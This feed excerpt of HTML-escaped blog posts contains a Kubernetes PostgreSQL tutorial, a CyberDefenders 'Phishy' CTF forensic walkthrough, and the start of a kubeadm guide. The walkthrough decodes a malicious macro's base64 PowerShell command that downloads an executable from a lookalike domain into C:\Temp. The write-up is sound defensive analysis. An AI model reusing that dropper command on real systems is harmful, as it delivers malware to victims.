&lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;config-map&lt;/span&gt;   &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;key:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;postgres-db&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;        &lt;span class=&#34;bullet&#34;&gt;-&lt;/span&gt; &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;POSTGRES_PASSWORD&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;          &lt;span class=&#34;attr&#34;&gt;valueFrom:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;            &lt;span class=&#34;attr&#34;&gt;secretKeyRef:&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;name:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;database-secret&lt;/span&gt;   &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;              &lt;span class=&#34;attr&#34;&gt;key:&lt;/span&gt; &lt;span class=&#34;string&#34;&gt;postgres-pass&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;2-create-the-pod&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#2-create-the-pod&#34;&gt;#&lt;/a&gt; 2- Create the Pod:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;justk8s@justk8s-master:~$ kubectl apply -f postgres.yaml&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;pod/postgresql created&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;3-list-the-created-pod&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#3-list-the-created-pod&#34;&gt;#&lt;/a&gt; 3- List The Created Pod:&lt;/h4&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;justk8s@justk8s-master:~$ kubectl get pods&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;NAME         READY   STATUS    RESTARTS   AGE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;postgresql   1/1     Running   0          8s&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;4-test-the-database-created-with-variables-of-configmap-and-secrets&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#4-test-the-database-created-with-variables-of-configmap-and-secrets&#34;&gt;#&lt;/a&gt; 4- Test the Database created with variables of ConfigMap and Secrets:&lt;/h4&gt;
&lt;p&gt;We can open a bash session on the pod and open the database  &lt;code&gt;mohamed&lt;/code&gt;  with the  &lt;code&gt;psql&lt;/code&gt;  command provided by the postgreSQL&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;justk8s@justk8s-master:~$ kubectl &lt;span class=&#34;built_in&#34;&gt;exec&lt;/span&gt; --stdin --&lt;span class=&#34;built_in&#34;&gt;tty&lt;/span&gt; postgresql  -- /bin/bash&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;root@postgresql:/&lt;span class=&#34;comment&#34;&gt;# psql -U &amp;quot;mohamed&amp;quot;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;psql (14.4 (Debian 14.4-1.pgdg110+1))&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Type &lt;span class=&#34;string&#34;&gt;&amp;quot;help&amp;quot;&lt;/span&gt; &lt;span class=&#34;keyword&#34;&gt;for&lt;/span&gt; &lt;span class=&#34;built_in&#34;&gt;help&lt;/span&gt;.&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;mohamed=&lt;span class=&#34;comment&#34;&gt;#&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;h4 id=&#34;references&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#references&#34;&gt;#&lt;/a&gt; References:&lt;/h4&gt;
&lt;p&gt;&lt;em&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9rdWJlcm5ldGVzLmlvL2RvY3MvdGFza3MvZGVidWcvZGVidWctYXBwbGljYXRpb24vZ2V0LXNoZWxsLXJ1bm5pbmctY29udGFpbmVyLw==&#34;&gt;Get a Shell to a Running Container&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9rdWJlcm5ldGVzLmlvL2RvY3MvY29uY2VwdHMvY29uZmlndXJhdGlvbi9jb25maWdtYXAv&#34;&gt;ConfigMaps&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9rdWJlcm5ldGVzLmlvL2RvY3MvY29uY2VwdHMvY29uZmlndXJhdGlvbi9zZWNyZXQv&#34;&gt;Secrets&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;&lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly9odWIuZG9ja2VyLmNvbS9fL3Bvc3RncmVz&#34;&gt;PostgreSQL Docker&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;
</content>
        <updated>2022-09-06T10:29:37.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/09/05/CyberDefenders/Phishy/</id>
        <title>CyberDefenders Writeup  Phishy</title>
        <link rel="alternate" href="http://example.com/2022/09/05/CyberDefenders/Phishy/"/>
        <content type="html">&lt;p&gt;This CTF challenge is about retrieving data from a disk image, and analyzing a maldoc using oledump.&lt;br&gt;
The maldoc download a malware in our victim personal computer! Let’s figure out what is going on!&lt;/p&gt;
&lt;h1 id=&#34;challenge-information&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#challenge-information&#34;&gt;#&lt;/a&gt; Challenge Information&lt;/h1&gt;
&lt;details class=&#34;info&#34;&gt;&lt;summary&gt;Description&lt;/summary&gt;&lt;div&gt;
&lt;p&gt;A company’s employee joined a fake iPhone giveaway. Our team took a disk image of the employee’s system for further analysis. As a security analyst, you are tasked to identify how the system was compromised.&lt;/p&gt;
&lt;/div&gt;&lt;/details&gt;
&lt;p&gt;Challenge Link &amp;amp; Author&lt;/p&gt;
&lt;div class=&#34;links&#34;&gt;&lt;div class=&#34;item&#34; title=&#34;Challenge Link&#34; style=&#34;--block-color:#2296fd;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly9jeWJlcmRlZmVuZGVycy5vcmcvYmx1ZXRlYW0tY3RmLWNoYWxsZW5nZXMvNjA=&#34; data-background-image=&#34;https://cyberdefenders.org/static/img/cyberdefenders-logo-white.png&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly9jeWJlcmRlZmVuZGVycy5vcmcvYmx1ZXRlYW0tY3RmLWNoYWxsZW5nZXMvNjA=&#34;&gt;Challenge Link&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;CyberDefenders - Phishy&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;div class=&#34;item&#34; title=&#34;Author - SemahBA&#34; style=&#34;--block-color:#de2336;&#34;&gt;&lt;span class=&#34;exturl image&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9CZW5hbGlTZW1haA==&#34; data-background-image=&#34;https://pbs.twimg.com/profile_images/1358429186348711936/QRHPcCVi_400x400.jpg&#34;&gt;&lt;/span&gt;
          &lt;div class=&#34;info&#34;&gt;
          &lt;span class=&#34;exturl title&#34; data-url=&#34;aHR0cHM6Ly90d2l0dGVyLmNvbS9CZW5hbGlTZW1haA==&#34;&gt;Author - SemahBA&lt;/span&gt;
          &lt;p class=&#34;desc&#34;&gt;SemahBA Twitter Profile&lt;/p&gt;
          &lt;/div&gt;&lt;/div&gt;&lt;/div&gt;
&lt;h1 id=&#34;walkthrough&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#walkthrough&#34;&gt;#&lt;/a&gt; Walkthrough&lt;/h1&gt;
&lt;p&gt;I use WSL, FTK imager and Registry Explorer&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;1- What is the hostname of the victim machine?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/UlU40CE.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
Let’s check  &lt;code&gt;SYSTEM\ControlSet001\Control\ComputerName\ComputerName&lt;/code&gt;  registry key&lt;br&gt;
&lt;img data-src=&#34;https://i.imgur.com/bUMRhhs.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Answer:  WIN-NF3JQEU4G0T&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;2- What is the messaging app installed on the victim machine?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img data-src=&#34;https://i.imgur.com/vE2xpqz.png&#34; alt=&#34;WhatsApp&#34;&gt;&lt;br&gt;
Answser: WhatsApp&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;3- The attacker tricked the victim into downloading a malicious document. Provide the full download URL.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;WhatsApp has a database that stores the messages and discussion. Let’s check  &lt;code&gt;\Users\Semah\AppData\Roaming\WhatsApp&lt;/code&gt; .We find a folder called  &lt;code&gt;Databases&lt;/code&gt;  that contains a  &lt;code&gt;db&lt;/code&gt;  that can be opened using  &lt;code&gt;DB Browser for SQLite&lt;/code&gt; . The messages are stored in  &lt;code&gt;msgstore.db&lt;/code&gt; &lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/SFlAYTD.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
We can open this db file using  &lt;code&gt;DB Browser&lt;/code&gt;  and check the  &lt;code&gt;legacy_available_messages_view&lt;/code&gt;  table and we will a discussion about IPhone 12 special edition giveaway&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/EGZVAxH.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
Answer:  &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL2FwcEllLmNvbS9JUGhvbmUtV2lubmVycy5kb2M=&#34;&gt;http://appIe.com/IPhone-Winners.doc&lt;/span&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;4- Multiple streams contain macros in the document. Provide the number of the highest stream.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The victim download the word document file. You can find it on  &lt;code&gt;Semah\Downloads&lt;/code&gt;  folder&lt;br&gt;
Let’s export it from FTK imager and use  &lt;code&gt;oledump&lt;/code&gt;  to check the streams in the document&lt;br&gt;
We find  &lt;code&gt;Macros/VBA/iphoneevil&lt;/code&gt;  the highest stream&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Raf²@4n6nk8s:~$ oledump IPhone-Winners.doc                                                                                       &lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  1:       114 &lt;span class=&#34;string&#34;&gt;&amp;#x27;\x01CompObj&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  2:      4096 &lt;span class=&#34;string&#34;&gt;&amp;#x27;\x05DocumentSummaryInformation&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  3:      4096 &lt;span class=&#34;string&#34;&gt;&amp;#x27;\x05SummaryInformation&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  4:      8473 &lt;span class=&#34;string&#34;&gt;&amp;#x27;1Table&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  5:       501 &lt;span class=&#34;string&#34;&gt;&amp;#x27;Macros/PROJECT&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  6:        68 &lt;span class=&#34;string&#34;&gt;&amp;#x27;Macros/PROJECTwm&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  7:      3109 &lt;span class=&#34;string&#34;&gt;&amp;#x27;Macros/VBA/_VBA_PROJECT&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  8:       800 &lt;span class=&#34;string&#34;&gt;&amp;#x27;Macros/VBA/dir&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;  9: M    1170 &lt;span class=&#34;string&#34;&gt;&amp;#x27;Macros/VBA/eviliphone&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt; 10: M    5581 &lt;span class=&#34;string&#34;&gt;&amp;#x27;Macros/VBA/iphoneevil&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Answer: 10&lt;/p&gt;
&lt;p&gt;Let’s do some analysis on the macro and the malicious document using the  &lt;code&gt;oletools&lt;/code&gt;&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;4&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;5&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;6&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;7&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;8&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;9&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;10&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;11&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;Raf²@4n6nk8s:~$ olevba IPhone-Winners.doc --deobf&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;olevba IPhone-Winners.doc --deobf                                                                                 ─╯&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;XLMMacroDeobfuscator: pywin32 is not installed (only is required &lt;span class=&#34;keyword&#34;&gt;if&lt;/span&gt; you want to use MS Excel)&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;olevba 0.60.1 on Python 3.10.4 - http://decalage.info/python/oletools&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;===============================================================================&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;FILE: IPhone-Winners.doc&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;Type: OLE&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;-------------------------------------------------------------------------------&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;VBA MACRO eviliphone.cls&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;keyword&#34;&gt;in&lt;/span&gt; file: IPhone-Winners.doc - OLE stream: &lt;span class=&#34;string&#34;&gt;&amp;#x27;Macros/VBA/eviliphone&amp;#x27;&lt;/span&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Scrolling a bit and we find a VBA string variable from the macro that contain base64 cipher, the macro try to execute the decoded&lt;br&gt;
ٍ&lt;img data-src=&#34;https://imgur.com/bvrf9oR.png&#34; alt=&#34;&#34;&gt;&lt;br&gt;
OK let’s decode it and check what the attacker want to do !&lt;/p&gt;
&lt;figure class=&#34;highlight bash&#34;&gt;&lt;figcaption&gt;&lt;span&gt;command line prompt&lt;/span&gt;&lt;/figcaption&gt;&lt;table&gt;&lt;tr&gt;&lt;td class=&#34;gutter&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;1&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;2&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;3&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;td class=&#34;code&#34;&gt;&lt;pre&gt;&lt;span class=&#34;line&#34;&gt;raf²@4n6nk8s:~$ &lt;span class=&#34;built_in&#34;&gt;echo&lt;/span&gt; -n &lt;span class=&#34;string&#34;&gt;&amp;quot;aQBuAHYAbwBrAGUALQB3AGUAYgByAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACcAaAB0AHQAcAA6AC8ALwBhAHAAcABJAGUALgBjAG8AbQAvAEkAcABoAG8AbgBlAC4AZQB4AGUAJwAgAC0ATwB1AHQARgBpAGwAZQAgACcAQwA6AFwAVABlAG0AcABcAEkAUABoAG8AbgBlAC4AZQB4AGUAJwAgAC0AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMA&amp;quot;&lt;/span&gt; | &lt;span class=&#34;built_in&#34;&gt;base64&lt;/span&gt; -d&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;&lt;/span&gt;&lt;br&gt;&lt;span class=&#34;line&#34;&gt;invoke-webrequest -Uri &lt;span class=&#34;string&#34;&gt;&amp;#x27;http://appIe.com/Iphone.exe&amp;#x27;&lt;/span&gt; -OutFile &lt;span class=&#34;string&#34;&gt;&amp;#x27;C:\Temp\IPhone.exe&amp;#x27;&lt;/span&gt; -UseDefaultCredentials&lt;/span&gt;&lt;br&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/figure&gt;
&lt;p&gt;Wow! The macro try to run an obfuscated  &lt;code&gt;powershell&lt;/code&gt;  command that download an executable from  &lt;code&gt;http://appIe.com/Iphone.exe&lt;/code&gt;  and save it as   &lt;code&gt;C:\Temp\IPhone.exe&lt;/code&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;5- The macro executed a program. Provide the program name?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Answer: Powershell&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;6- The macro downloaded a malicious file. Provide the full download URL.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Answer: &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL2FwcEllLmNvbS9JcGhvbmUuZXhl&#34;&gt;http://appIe.com/Iphone.exe&lt;/span&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;7- Where was the malicious file downloaded to? (Provide the full path)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Answer:  C:\Temp\IPhone.exe&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;8- What is the name of the framework used to create the malware?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I am sure that Metasploit is the framework. But let’s make it like we get the points without guessing the answer! OK dude upload the malicious file downloaded to our love  &lt;code&gt;virustotal&lt;/code&gt; &lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/BKPJ37M.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Just google  &lt;code&gt;Meterpreter&lt;/code&gt;  and you’ll find that Meterpreter is a Metasploit attack payload that provides an interactive shell&lt;/p&gt;
&lt;p&gt;Ok dude don’t search ! go to  &lt;code&gt;COMMUNITY&lt;/code&gt;  tab in  &lt;code&gt;virustotal&lt;/code&gt;  and you’ll find comments. You’ll find a metasploit payload detected !&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/xuOEWiC.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Answer: Metasploit&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;9- What is the attacker’s IP address?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;OK! Now we know that the malicious document download a binary! Of course this binary is a malware.&lt;br&gt;
We need to know what is the attacker’s IP address. So let’s do some dynamic analysis. We can do it using either  &lt;code&gt;any.run&lt;/code&gt;  or  &lt;code&gt;hybrid-analysis&lt;/code&gt; . I will use it both of them just for fun !! Just upload the binary  &lt;code&gt;IPhone.exe&lt;/code&gt;  and check the connections !&lt;/p&gt;
&lt;p&gt;ٍ&lt;img data-src=&#34;https://imgur.com/w04BlMl.png&#34; alt=&#34;&#34; title=&#34;Using app.run.any&#34;&gt;&lt;br&gt;
ٍ&lt;img data-src=&#34;https://imgur.com/wNJKnce.png&#34; alt=&#34;&#34; title=&#34;Using HYBRID ANALYSIS&#34;&gt;&lt;/p&gt;
&lt;p&gt;Answer: 155.94.69.27&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;10- The fake giveaway used a login page to collect user information. Provide the full URL of the login page?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We find firefox installed in the victim device, Mozilla Firefox browsers stores his history and cookies in  &lt;code&gt;AppData\Roaming\Mozilla\Firefox\&lt;/code&gt; . We can inspect it using SQLite Browser.&lt;br&gt;
The most important db file is  &lt;code&gt;places.sqlite&lt;/code&gt; . Inspect it and open the  &lt;code&gt;moz_places&lt;/code&gt;  database table and check the history of the victim !&lt;br&gt;
&lt;img data-src=&#34;https://imgur.com/qbtAcRf.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;
&lt;p&gt;Answer:  &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cDovL2FwcEllLmNvbXBldGl0aW9ucy5jb20vbG9naW4ucGhw&#34;&gt;http://appIe.competitions.com/login.php&lt;/span&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;11- What is the password the user submitted to the login page?&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;There is a tool called  &lt;code&gt;Password Fox&lt;/code&gt;  that will resolve our problem here !&lt;br&gt;
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.&lt;br&gt;
Download it from &lt;span class=&#34;exturl&#34; data-url=&#34;aHR0cHM6Ly93d3cubmlyc29mdC5uZXQvdXRpbHMvcGFzc3dvcmRmb3guaHRtbA==&#34;&gt;here&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;img data-src=&#34;https://imgur.com/pM1lfwD.png&#34; alt=&#34;&#34; title=&#34;Here is the password&#34;&gt;&lt;/p&gt;
&lt;p&gt;Answer: GacsriicUZMY4xiAF4yl&lt;/p&gt;
</content>
        <updated>2022-09-05T15:46:09.000Z</updated>
    </entry>
    <entry>
        <id>http://example.com/2022/08/05/Kubernetes/kubeadm/</id>
        <title>Setting Up Kubernetes with Kubeadm</title>
        <link rel="alternate" href="http://example.com/2022/08/05/Kubernetes/kubeadm/"/>
        <content type="html">&lt;p&gt;&lt;span class=&#34;red&#34;&gt;Kubeadm&lt;/span&gt; is a tool used to build Kubernetes (K8s) clusters. Kubeadm performs the actions necessary to get a minimum viable cluster up and running quickly. By design, it cares only about bootstrapping, not about provisioning machines (underlying worker and master nodes).&lt;/p&gt;
&lt;div class=&#34;note success&#34;&gt;
&lt;p&gt;Knowing how to use kubeadm is required for CKA and CKS exams&lt;/p&gt;
&lt;/div&gt;
&lt;p&gt;We configure a 3 &lt;span class=&#34;pinky&#34;&gt;Ubuntu 20.04 LTS&lt;/span&gt; machines in the same network with the following proprietes:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;th&gt;Hostname&lt;/th&gt;
&lt;th&gt;IP address&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Master&lt;/td&gt;
&lt;td&gt;4n6nk8s-master&lt;/td&gt;
&lt;td&gt;192.168.1.18/24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Worker&lt;/td&gt;
&lt;td&gt;4n6nk8s-worker1&lt;/td&gt;
&lt;td&gt;192.168.1.19/24&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Worker&lt;/td&gt;
&lt;td&gt;4n6nk8s-worker2&lt;/td&gt;
&lt;td&gt;192.168.1.20/24&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;Note: Make sure to setup a unique hostname for each host&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id=&#34;prepare-the-environments&#34;&gt;&lt;a class=&#34;markdownIt-Anchor&#34; href=&#34;#prepare-the-environments&#34;&gt;#&lt;/a&gt; Prepare the environments&lt;/h2&gt;
&lt;p&gt;The following Steps must be applied to each node (both master nodes and worker nodes)&lt;/p&gt;
